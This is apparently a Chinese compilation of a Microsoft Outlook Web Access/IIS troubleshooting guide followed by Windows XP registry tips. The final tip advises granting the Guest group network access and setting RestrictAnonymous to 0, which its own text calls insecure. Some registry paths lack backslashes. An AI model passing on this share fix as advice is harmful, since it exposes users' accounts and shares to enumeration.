go.microsoft.com/fwlink/?LinkId=3052&ID=293386。您在 Davex.dll（或 Exprox.dll，如果它是前端服务器）上的 NTFS 权限不正确。为安全起见，请确保已验证身份的用户对 %SystemRoot%system32 和 ExchsrvBin 目录拥有最小的读取和执行权限。症状 403 拒绝访问可能的原因和解决方法用户已成功验证身份，但无法访问此资源。如果适合，请授予用户访问此资源的权限。用户尝试使用一个以开头的 URL 访问服务器，但是要求 SSL。用户必须键入才能访问服务器。已对用户尝试访问的 Exchange 虚拟目录禁用目录浏览。如果适合，请启用目录浏览。症状 404 未找到可能的原因和解决方法指定的位置不存在请求的内容项。如果 Outlook Web Access 以前显示的内容项后来在 Outlook 中删除了，则可能会发生此错误。Outlook Web Access 中的视图不自动刷新；如果您在 Outlook 中删除一个内容项，稍后尝试在 Outlook Web Access 打开该项，则会收到此错误，因为在服务器上的这个位置已不存在该内容项。如果您在访问 <服务器>/exchange 时收到一个 401 拒绝访问错误，或在访问 <服务器>/exchange/<用户名>时收到一个 404 未找到错误，则您在尝试验证其身份的用户可能没有一个 SMTP 地址与 Exchange 系统管理器中对应的 SMTP 虚拟目录上设置的 SMTP 域相匹配。有关更多信息，请参见 Microsoft 知识库文章 Q293386“XWEB: Error Message: HTTP/1.0 401 or 404”（XWEB：错误消息：HTTP/1.0 401 或 404），网址是 go.microsoft.com/fwlink/?LinkId=3052&ID=293386。您在 IIS 中配置了 URLscan，该配置阻止请求。有关更多信息，请参见 Microsoft 知识库文章 Q309508“XCCC: IIS Lockdown and URLscan Configurations in an Exchange Environment”（XCCC：Exchange 环境中的 IIS 锁定和 URLscan 配置），网址是：go.microsoft.com/fwlink/?LinkId=3052&ID=309508。如果您是从 Microsoft Exchange Server 5.5 版中的 Outlook Web Access 升级此服务器的，则仍可以配置 Exchfilt.dll，使处理 Outlook Web Access 的本地化。有关更多信息，请参见 Microsoft 知识库文章 Q288123“HTTP Error 404 “Page Cannot Be Displayed” When You Attempt to Connect to the OWA Server”（尝试连接到 OWA 服务器时出现 HTTP 错误 404 ‘页面无法显示’），网址是 go.microsoft.com/fwlink/?LinkId=3052&ID=288123。 Outlook Web Access 运行所在的虚拟目录可能有一些绑定（IP 地址、主标题或 TCP 端口）与用户在 Web 浏览器中键入的不相同，例如，如果在 IIS 中在 Exchange 虚拟目录上设置了一个主机标题 myserver.fabrikam.com，而用户键入 myserver/exchange 来访问他们的邮箱，则他们可能会收到 404 未找到错误，因为两个 URL 不完全匹配。若要修正这种不一致现象，请在虚拟目录中添加另一个叫做 myserver 的主机标题。类似地，TCP 端口或 IP 地址可能与用户当前用于访问 Outlook Web Access 的 TCP 端口或 IP 地址不同，这也可能会导致出现 404 未找到错误。

注 Internet 服务管理器中的主机标题与系统管理器中的主机名相同。症状 405 不允许的方法可能的原因和解决方法如果未明确允许运行脚本和可执行文件，而您尝试运行 Active Server Page (.asp) 或访问一个动态链接库 (.dll) 文件，则可能看到此错误。若要纠正此错误，请允许脚本和可执行文件运行，但应知道允许您的 Web 站点上运行可执行文件会带来潜在的安全风险。症状 500 内部服务器错误可能的原因和解决方法用户的浏览器（例如 Internet Explorer 6）支持 Kerberos 身份验证，而客户机与 Exchange 服务器之间的时钟设置差大于 5 分钟。设法使两台计算机的时间同步。如果 Exchange 服务器无法与 Active Directory 服务器联系，则可能发生此错误。最常见是外围网络（又称 DMZ、非军事区和屏蔽子网）中的前端服务器的问题，在此服务器上，内部防火墙上相应的端口未打开，因而不允许前端服务器与 Active Directory 联系。前端服务器不在任一已配置的网络子网中；发生此情况的通常原因是：您将一个前端服务器移到了一个外围网络中，但没有接着在 Active Directory 站点和服务中配置外围网络子网。若要配置有问题的子网，请使用 Active Directory 站点和服务 Microsoft 管理控制台 (MMC) 管理单元。在 IIS 中任何时间进行身份验证常常失败。有关更多信息，请参见本文中后面的“如何确定是 Exchange 还是 IIS 导致错误”。如果按该节中的步骤操作后仍不能解决问题，则您遇到的可能是 IIS 身份验证失败。验证 IIS 是否能够至少与一个域控制器联系。如果您在尝试运行 Exchange 虚拟目录中的某个应用程序（例如 .asp 文件）时收到此错误，则可能是因为您没有启用应用程序保护。有关更多信息，请参见本文中后面的“在 IIS 中验证虚拟服务器和目录权限”。症状 503 没有服务可能的原因和解决方法此错误通常表明 Microsoft Exchange 信息存储服务当前未运行，或邮箱数据库未装入。如果您通过一个前端服务器访问 Outlook Web Access，请验证在包含该邮箱的后端服务器上是否在运行此服务。如果您在访问一个不指向 Exchange 邮箱或公共文件夹的虚拟目录时看到此错误，则可能是某个人在 Exchange 系统管理器下创建了一个虚拟服务器，然后又在 IIS 中在该虚拟服务器下创建了一个虚拟目录。这种不一致导致配置无效。有关更多信息，请参见 Microsoft 知识库文章 Q282230“XGEN: Error Message “HTTP/1.1 503 Service Unavailable” on Multiple Web Sites on Single Server”（XGEN：在单个服务器的多个 Web 站点上出现错误消息‘HTTP/1.1 503 没有服务’），网址是 go.microsoft.com/fwlink/?LinkId=3052&ID=282230。错误类别：IIS 错误

本节讲述 IIS 错误症状及其可能的原因和解决方法。症状 -2146893055 (0x80090301) 可能的原因和解决方法此错误说明您使用了一个能够进行 Kerberos 身份验证的浏览器，但客户机和服务器之间的时钟设置差大于 5 分钟。若要解决此问题，请让两台计算机的时间同步；或者，如果想允许客户机和服务器之间的时间差有更大灵活性，请增大域策略中的 Kerberos 时间偏差。如想获得一种较长期的解决方案，请使用“Windows 时间服务”来使该域中所有计算机的时间都同步。错误类别：Outlook Web Access 行为

本节讲述一些表明可能有问题的 Outlook Web Access 行为及其可能的原因和解决方法。症状您在下载一个附件时收到多个提示。可能的原因和解决方法服务器安装了 Exchange 2000 Server Service Pack 1 (SP1)。请尝试升级到一个较新的服务包。症状左框架中的导航栏正常显示，但显示文件夹内容的右框架不能正常显示。内容框架中正在加载…这一句的显示时间特别长，而该文件夹中的内容项列表一直不显示。您收到一个脚本错误。可能的原因和解决方法如果在使用 Internet Explorer 5 或其更高版本时出现这些症状中的任何一种，但在使用任何其他服务器时未出现，则错误原因可能是：客户机和服务器之间的一个防火墙或代理服务器阻止了来自客户机上的浏览器的请求。有关更多信息，请参见 Microsoft 知识库文章 Q296232“XCCC: Empty Inbox When Using Internet Explorer 5 and Later to Gain Access to OWA”（XCCC：使用 Internet Explorer 5 及更高版本访问 OWA 时收件箱为空），网址是 go.microsoft.com/fwlink/?LinkId=3052&ID=296232。用户的浏览器没有设置首选语言。若要在 Internet Explorer 中设置首选语言，请在工具菜单上选择 Internet 选项。在常规选项卡上，单击语言，然后单击添加。您在 IIS 中配置了 URLscan，该配置阻止请求。有关更多信息，请参见 Microsoft 知识库文章 Q309508“XCCC: IIS Lockdown and URLscan Configurations in an Exchange Environment”（XCCC：Exchange 环境中的 IIS 锁定和 URLscan 配置），网址是：go.microsoft.com/fwlink/?LinkId=3052&ID=309508。如果出现上述症状中的任何一种，请确保 IIS 中的 Exchwebin 虚拟目录拥有适当的执行权限。

确保您拥有适当的执行权限单击开始，指向程序，再指向管理工具，然后单击 Internet 服务管理器。单击展开 Web 站点，然后单击展开 Exchweb。在控制台窗格中，右键单击 bin，然后单击属性。在虚拟目录选项卡上的应用程序设置下，检查是否选中了执行许可旁边的 Scripts and Executables（脚本和可执行文件）。症状框架可显示出来，但尽管内容框架中显示正在加载…，却没有加载任何图像或图标。可能的原因和解决方法错误原因可能是 <驱动器>:ExchsrvrExchweb 目录中的 NTFS 权限不正确。确保已验证身份的用户和匿名帐户对此目录及其下的所有目录至少拥有读权限。 IIS 中 Exchweb 虚拟目录的身份验证设置不正确。尝试对虚拟目录启用匿名访问。启用匿名访问意味着您必须正确配置匿名帐户，而且匿名帐户必须对服务器拥有在本地登录权限。有关更多信息，请参见 Microsoft 知识库文章 Q280823“XCCC: OWA 2000 Icons and Folder Items Are Not Displayed”（XCCC：不显示 OWA 2000 图标和文件夹项），网址是 go.microsoft.com/fwlink/?LinkId=3052&ID=280823。其他疑难解答步骤

本节中的步骤用于对您在上文中确定的问题范围集中进行疑难解答。下面各节还包含用于在 Outlook Web Access 中检查错误的更多最佳做法。如何确定是 Exchange 还是 IIS 导致的错误

Outlook Web Access 与 IIS 紧密集成在一起。因此，IIS 中的问题可能会传播，使 Outlook Web Access 也出现问题。本节包含一系列步骤，旨在帮您确定在贵组织中是不是 IIS 导致了 Outlook Web Access 错误。以下步骤描述如何：在 IIS 中创建新的虚拟目录。对新的虚拟目录启用基本身份验证并禁用匿名访问。在该目录中添加一个示例 HTML 文档。验证您是否可以从 Web 浏览器访问该文档。

如果您能够访问该示例 HTML 文档，则说明问题与 IIS 无关。如果按这些步骤操作后仍不能访问该文档，则问题可能与 Exchange 和 Outlook Web Access 无关，因而应当检查您在 IIS 中所设置的权限或其他配置。

注有关检查权限的更多信息，请参见 Microsoft 知识库文章 Q187506“List of NTFS Permissions Required for IIS Site to Work”（IIS 站点正常运行所需要的 NTFS 权限列表），网址是 go.microsoft.com/fwlink/?LinkId=3052&ID=187506。

如何在 IIS 中创建新的虚拟目录单击开始，指向程序，再指向管理工具，然后单击 Internet 服务管理器。在 Internet 信息服务中，单击展开本地计算机对象，然后单击展开 Web 站点。右键单击默认 Web 站点，指向新建，然后单击虚拟目录。虚拟目录创建向导便打开了。单击下一步。在虚拟目录别名中，为该虚拟目录键入一个名称（例如 test），然后单击下一步。在Web 站点内容目录中，键入将可通过此虚拟目录访问的本地硬盘上的路径。例如，在您的硬盘上创建一个名为 test 的目录，并在向导中指向此目录。在访问权限中，让读处于选中状态，而清除所有其他复选框。单击下一步以完成该向导。

如何启用基本访问并禁用匿名访问在 Internet 信息服务中，右键单击您的新虚拟目录，然后单击属性。在目录安全性选项卡上的匿名访问和验证控件下，单击编辑。在身份验证方法中，在已验证身份的访问下，单击选择基本身份验证，然后单击清除所有其他选项。只应选择基本身份验证。

如何在此虚拟目录中创建文件单击开始，然后单击运行。在运行中，键入 notepad.exe，然后单击确定。在记事本中，键入一些简单的 HTML 文本，例如 “This is a test”（有没有引号都可以）。在您的虚拟目录中使用 .htm 扩展名保存该文件（不要使用默认扩展名 .txt）。

如何使用 Web 浏览器访问此文件打开您的 Web 浏览器。键入下面的 URL：<服务器名>/<虚拟目录名>/<文档名>。如果您的服务器名是 myserver，而且您已将您的虚拟目录命名为 test，并将您的文档命名为 test.htm，则应当键入 myserver/test/test.htm。

注在上面 <服务器名>的位置，您可能需要输入主机标题或完全限定域名（例如 server.fabrikam.com）。您也可以使用服务器的 IP 地址。

重要说明若要访问在 Internet 服务管理器 MMC 管理单元中创建的虚拟目录中的文件，您使用的帐户必须有在本地登录权限（Outlook Web Access 不要求这些权限）。检查文件系统权限

任何用于对 Outlook Web Access 错误进行疑难解答的帐户都必须对运行 Exchange 的计算机上的以下目录拥有读取和执行权限： WinNTsystem32 WinNTSystem32inetsrv Program FilesExchsrvrin Program FilesExchsrvrRES WinNTSystem32wbem Program FilesExchsrvrExchweb

设置对目录的读取和执行权限单击开始，指向程序，再指向附件，然后单击 Windows 资源管理器。右键单击所需要的目录，然后单击权限。选择您要在进行疑难解答时使用的组或帐户，然后单击选择读取和执行（如果需要）。检查用户权限

验证您是否可以从网络上的另一计算机访问 Exchange 服务器上的文件共享区。下面的步骤描述如何通过共享一个文件然后从另一计算机访问该共享文件来实现此目的。

创建一个共享文件单击开始，指向程序，再指向管理工具，然后单击 Internet 服务管理器。在 Internet 信息服务中，右键单击一个虚拟目录（例如您在本文中前面的“如何确定是 Exchange 还是 IIS 导致的错误”一节中创建的测试目录），然后单击权限。单击添加，在 Select Users, Computers, or Groups（选择用户、计算机或组）中，键入您要在进行疑难解答时使用的帐户，然后单击确定。选择您添加的帐户，然后检查是否选择了读旁边的允许。此步骤可确保您的帐户对共享目录拥有读权限。

访问该共享文件在网络中的另一计算机上，单击开始，然后单击运行。键入 <服务器名><共享名>，其中 <共享名>是您在上面的设置共享步骤中配置的目录的名称。在系统管理器中查看虚拟服务器和目录权限

在 IIS 中，您可以对虚拟目录或虚拟服务器设置权限，以允许以下操作：读访问读取和打开公告、邮件等。写访问在公共文件夹中张贴公告，发送邮件，等等。脚本资源访问下载脚本的源代码，而非运行脚本。目录浏览查看一个文件夹的内容。执行许可运行脚本或可执行文件。

确保按照您的组织的需要配置这些权限。例如，如果您将一个虚拟目录仅用于访问一个邮箱服务器，则默认设置为启用读、写、脚本资源访问和目录浏览权限，而执行许可设置为无。在 IIS 中验证虚拟服务器和目录权限

本节讲述如何使用 Internet 服务管理器 MMC 管理单元来确保 Outlook Web Access 使用的 IIS 目录的权限已正确分配。

打开 Internet 服务管理器单击开始，指向程序，再指向管理工具，然后单击 Internet 服务管理器。

在 Internet 信息服务中，验证下面的权限是否正确。

验证对 Exchweb 虚拟目录的权限在 Internet 信息服务中，单击展开本地计算机对象，单击展开 Web 站点，然后单击默认 Web 站点。在细节窗格中，右键单击 Exchweb，然后单击属性。在虚拟目录选项卡上，验证读是否已选中。

验证对 Exchwebin 虚拟目录的权限在 Internet 信息服务中，单击展开本地计算机对象，单击展开 Web 站点，单击展开默认 Web 站点，然后单击 Exchweb。在细节窗格中，右键单击 bin，然后单击属性。在虚拟目录选项卡上，验证：读已选中在应用程序设置下，执行许可已设置为 Scripts and Executables（脚本和可执行文件） Exchwebin 中的应用程序保护

Outlook Web Access 使用的 ASP 页存储在 Exchwebin文件夹中（其中指语言）。如想使任何 ASP 页运行，必须对 Exchwebin 虚拟目录或其父目录之一启用应用程序保护。应用程序保护确定应用程序是与 Web 服务在同一进程中运行，在所有应用程序共享的独立汇集进程中运行，还是在与其他应用程序分离的独立汇集进程中运行。

如果您在访问 Exchwebin目录中的一个 ASP 页时收到 HTTP 500 错误，但在 Exchweb 中检索其他项（如 .gif 文件）能够正常进行，则可能是对 Exchwebin 目录、Exchweb 目录或 HTTP 虚拟服务器未启用应用程序保护。

启用应用程序保护在 Internet 信息服务中，单击展开本地计算机对象，单击展开 Web 站点，单击展开默认 Web 站点，然后单击 Exchweb。在细节窗格中，右键单击 bin，然后单击属性。在虚拟目录选项卡的应用程序设置下，单击创建。在应用程序保护列表中，选择适当的保护级别：低（IIS 进程）、中等（池）或高（独立）。确保复制 IIS 设置

Exchange 将配置信息存储在 Active Directory 中，IIS 将配置信息存储在元数据库（计算机上的一个本地数据库）中。Exchange System Attendant（Exchange 系统助理）服务确保将 Exchange HTTP 虚拟服务器的配置信息复制到本地元数据库，从而使 IIS 能够访问这些信息。

这种复制只能单向进行；所以，在元数据库 (IIS) 中所作的更改不会复制给 Active Directory (Exchange)。因此，某些配置更改必须在系统管理器（而非 Internet 服务管理器）中进行。复制过程在系统助理运行时每隔 15 分钟发生一次，或者在 Exchange 系统管理器中执行更改后也会立即进行复制。

当您在 Internet 服务管理器中查看 IIS 配置设置时，您就是直接在元数据库中查看配置。如果某个复选框在 IIS（Internet 服务管理器）中未选中，但它在 Exchange（系统管理器）中选中了，则在目录中选中的属性的值有效，但元数据库中的这个值无效。

使用系统管理器，仅在 Exchange 中设置以下配置：除默认 Exchange HTTP 虚拟服务器以外的虚拟服务器的主机标题和 IP 地址身份验证方法读/写和其他权限

使用 Internet 服务管理器，仅在 IIS 中设置以下配置：默认虚拟服务器的主机标题和 IP 地址安全套接字层 (SSL) HTTP 登录

作为一般规则，如果系统管理器中存在执行操作的 UI，则请使用系统管理器。如果系统管理器中没有所需的 UI，请使用 Internet 服务管理器。复制问题症状

有两种主要症状表明从 Exchange 到 IIS 的复制过程可能有问题：如果您以某种方式配置一个选项，但 20 分钟后发现该选项已重置，则可能是您在 Internet 服务管理器中配置了一个本应在系统管理器中配置的选项。如果您在系统管理器中配置了一个选项，但该配置没有以同样的配置设置出现在 Internet 服务管理器中（等 30 分钟让复制完成），则很可能根本没有发生复制。验证“系统助理”是否在运行，并验证计算机是否能访问 Active Directory。疑难解答工具

本节讨论可用来帮助您对常见 Outlook Web Access 问题（例如本文讨论的问题）进行疑难解答的一些工具。网络监视器网络监视器用于监视通讯量并判定前端服务器和其他服务器之间发生的确切情况。设置一个与服务器连接的客户端，监视客户端浏览器和 Exchange 服务器之间的通讯量。如果您使用 SSL，将无法查看网络通讯量，因为它是加密的。事件查看器事件日志文件用于提供可帮助您缩小问题范围的错误号和错误描述。查找事件 ID，并在 Microsoft 知识库中搜索这些 ID。这些项可提供问题的线索。 IIS 日志使用 IIS 日志文件可让您知道访问了哪些资源，以及返回到浏览器的任何错误。这些日志文件在使用了 SSL 而网络监视器选项不可用的情况下尤其有用。不同的浏览器使用一个以上的浏览器来重现问题。正如前面所提到的，最好使用一个以上的浏览器或客户机来重现问题。除主浏览器外，再安装一些浏览器。遇到问题后，尝试使用多个浏览器重现这些问题。其他资源 Q243280 Users Can Log in Using User Name or User Principal Name（用户可使用用户名或用户主要名称登录）

go.microsoft.com/fwlink/?LinkId=3052&ID=243280 Q293386 XWEB: Error Message: HTTP/1.0 401 or 404（XWEB：错误消息：HTTP/1.0 401 或 404）

go.microsoft.com/fwlink/?LinkId=3052&ID=293386 Q309508 XCCC: IIS Lockdown and URLscan Configurations in an Exchange Environment（XCCC：Exchange 环境中的 IIS 锁定和 URLscan 配置）

go.microsoft.com/fwlink/?LinkId=3052&ID=309508 Q288123 HTTP Error 404 “Page Cannot Be Displayed” When You Attempt to Connect to the OWA Server（尝试连接到 OWA 服务器时出现 HTTP 错误 404 ‘页面无法显示’）

go.microsoft.com/fwlink/?LinkId=3052&ID=288123 Q282230 XGEN: Error Message “HTTP/1.1 503 Service Unavailable” on Multiple Web Sites on Single Server（XGEN：在单个服务器的多个 Web 站点上出现错误消息‘HTTP/1.1 503 没有服务’）

go.microsoft.com/fwlink/?LinkId=3052&ID=282230 Q296232 XCCC: Empty Inbox When Using Internet Explorer 5 and Later to Gain Access to OWA（XCCC：使用 Internet Explorer 5 及更高版本访问 OWA 时收件箱为空）

go.microsoft.com/fwlink/?LinkId=3052&ID=296232 Q280823 XCCC: OWA 2000 Icons and Folder Items Are Not Displayed（XCCC：不显示 OWA 2000 图标和文件夹项）

go.microsoft.com/fwlink/?LinkId=3052&ID=280823 Q187506 List of NTFS Permissions Required for IIS Site to Work（IIS 站点正常运行所需要的 NTFS 权限列表）

go.microsoft.com/fwlink/?LinkId=3052&ID=187506 , ,

篇5：WIN技巧：WINUpdate技巧二则

Windows XP中的Windows Update是用来升级系统的组件，我们通过它来更新系统，扩展系统的功能，让系统支持更多的软、硬件，解决各种兼容性问题，让系统更稳定、安全，这里就为大家介绍两则有关Windows Update的实用技巧。

一、轻松查看系统已安装的补丁

要查看系统已经安装了哪些补丁，通常有2种方法：

方法1：使用Windows Update连接到微软的更新站点，点击“查看安装历史”，页面中会详细列出系统中安装过的补丁及其安装时间。

方法2：在Windows XP中，运行“Cmd”后回车，在命令提示符窗口中输入“systeminfo >systeminfo.txt”后回车，你会发现在当前目录下生成了一个名为systeminfo.txt的文本文件，里面记录了本机安装的补丁信息和系统主要配置信息。

二、避免重复更新

这个问题常常出现在Windows XP中，尤其是一个编号为KB823980的补丁，

出现这个问题时，我们首先记下这个重复提醒更新的补丁编号，假设为“KB100000”。然后尝试用以下办法来解决：

1.打开注册表编辑器，依次展开[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall]分支，在其下建立一个名为“KB100000”的分支并进入该分支，然后双击右侧窗口中的“默认”字符串，并将其值命名为“This Key is required to STOP Windows update from prompting for an install”，退出注册表编辑器后重新启动计算机即可。

2.打开注册表编辑器，依次展开[HKEY_LOCAL_MACHINESOFTWAREMicrosoftUpdatesWindows PSPx]分支（如果你的系统是Windows XP SP1，则“x”为“2”，系统是Windows XP SP2，则“x”为“3”），在其子键中删除以“KB100000’命名的键，最后重新启动系统生效即可。

篇6：WIN技巧：如何隐藏硬盘分区

巧妙利用注册表

第一招：修改注册表来隐藏逻辑硬盘

操作步骤如下：

①“开始”→“运行”中输入regedit，打开注册表编辑器，

②进入HKEY_CURR

ENT_USER＼SoftWare＼microsoft＼Windows＼CurrentVersion＼Policies＼Explorer分支中。

③在右窗口中新建一个二进值的键值名为“NoDrives”，磁盘驱动器所一一对应的键值如下：A驱为“01000000”，B驱为“0000”，C驱为“04000000”，D驱为“08000000”，E驱为“10000000”，F驱为“20000000”。即按磁盘驱动器的英文字母顺序（A－Z）从十六进制的二倍数递增。将您所要隐藏的磁盘驱动器所对应的键值按十六进制相加赋值给“NoDrives”，这样，就在“我的电脑”内隐藏起所要隐藏的驱动器了。

这样操作后，进入“MS－DOS方式”还是可以操作的。所以我们还要隐藏“MS-DOS方式”下的磁盘驱动器。

2、隐藏“MS-DOS方式”下的磁盘驱动器

操作步骤如下：

①“开始”→“运行”中输入regedit，打开注册表编辑器，

②进入HKEY_CURRENT_USER＼SoftWare＼Microsoft＼Windows＼CurrentVersion＼Policies分枝中。

③在该分枝中新建一个主键“WinOldApp”，在该主键下新建一个DWORD值的键值名“Disabled”，然后将其键值设为“1”。

这样，不管是在“我的电脑”里，或“MS－DOS”方式下都看不见了，怎么样，够Cool吧！^_^不过，只要懂注册表的人可骗不了他。

用PartitionMagic来隐藏

第二招：利用PartitionMagic隐藏硬盘驱动器

相信大家对这个软件不会太陌生吧，它的不破坏硬盘数据情况下对硬盘分驱的功能确实很不错。不过你有没有想到用它来隐藏硬盘驱动器呢？那就试试看吧！

①运行PQMagic。

②选定一个分区。

③在菜单“Operations”中选“Advanced”下的“HidPartition”菜单项，在出现的对话框中点击OK。

④在主窗口下面的两个按钮中点击“Apply”按钮后重新启动

篇7：WIN技巧：windows共享

访问报无权限解决方法:

1.设置本地的administrator账户的密码.

2.设置网络访问模式为经典模式.

3.设置允许从网络访问计算机的用户账户(加入Guest组).

4 .设置禁止从网络访问计算机的用户账户(删除Guest组).

设置方法:

开始-->运行gpedit.msc-->计算机配置-->windows设置-->安全设置(Security Settings)-->本地策略(Local Policies)

1.:用户权利指派(User Rights Assignment)-->从网络访问此计算机(Access this computer from the network)-->添加Guest组.

2.:用户权利指派(User Rights Assignment)-->拒绝从网络访问这台计算机(Deny access to this computer from the network)-->删除Guest组.

3.:安全选项(Security Options)-->网络访问:本地账户的共享和安全模式(Network access:Sharing and security model for local accounts)-->更改为经典模式.

如果你完全依了上面的方法都不行，请运行REGEDIT，到：

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa 上将此子健中的值 restrictanonymous设为0就行了，

WIN技巧：windows共享

，

把：restrictanonymoussam的值也改成0吧。

以下是说明：

1、RestrictAnonymous 中登记了控制任何用户获取本机信息的级别的设置，如果 RestrictAnonymous被设置为0（默认值）的话，任何用户都可以通过网络获取本机的信息，包含用户名，详细的帐号策略和共享名。这些信息可以被攻击者在攻击计算机的时候所利用。通过这些信息，攻击者就有可能了解到当前计算机的系统管理员帐号，网络共享的路径以及不健壮的密码。修改此安全级别的方法如下：运行 Regedit.exe 编辑注册表，定位到子健 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa 上将此子健中的值 restrictanonymous 由不安全的 0值修改为安全级别高一些值 1 或 2。注意：此安全级别如果提高的话有可能造成本计算机在局域网内无法被访问到。

2、当禁用了TIP/IP高级选项中的Wins中的NetBios设置，局域网无法被访问到。

3、如果中了震荡波病毒将不能访问到局域网。

4、如果没有将IP设置成固定IP，局域网功能将受限。